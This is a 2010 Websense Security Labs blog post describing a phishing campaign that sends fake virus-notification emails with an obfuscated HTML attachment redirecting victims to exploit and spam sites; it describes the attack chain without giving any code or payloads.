June 10, 2010

Malicious virus notification emails on the prowl

Chris Astacio

Websense® Security Labs™ ThreatSeeker™ Network has detected a new wave of interesting malicious emails.  This new campaign uses some social engineering scare tactics to encourage users to open the HTML attachment sent in the email.  The interesting thing about the attachment is that it's only script code and the script code looks very much like script code which has been used in script injections on legitimate Web pages.  The body of the email states that the recipient has been infected with a number of viruses and that the recipient should open the attached HTML document to clean up his or her computer.

Screen shot of the email:

Looking at the raw contents of the attached HTML file, we can see that it is nothing more than an obfuscated script.  If the script is allowed to run, the script opens a new web page in your browser that either redirects you to an attack site or to a spam page.  The attack on your computer takes place only the first time the script runs, after that you are redirected to spam sites.


Screen shot of the HTML attachment:

Looking at the code on the attack site, we see that it uses a meta refresh tag to redirect visitors upon loading the page.  We also notice a small 1x1 iframe that is loaded in your browser.

Screen shot of the site opened by "Virus Scan.html":


The attack site contains more obfuscated JavaScript that creates an iframe to a PDF file and another to a Java .jar file.  It then attempts to attack your computer using either of these files.


Websense Messaging and Websense Web Security customers are protected against these attacks.

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.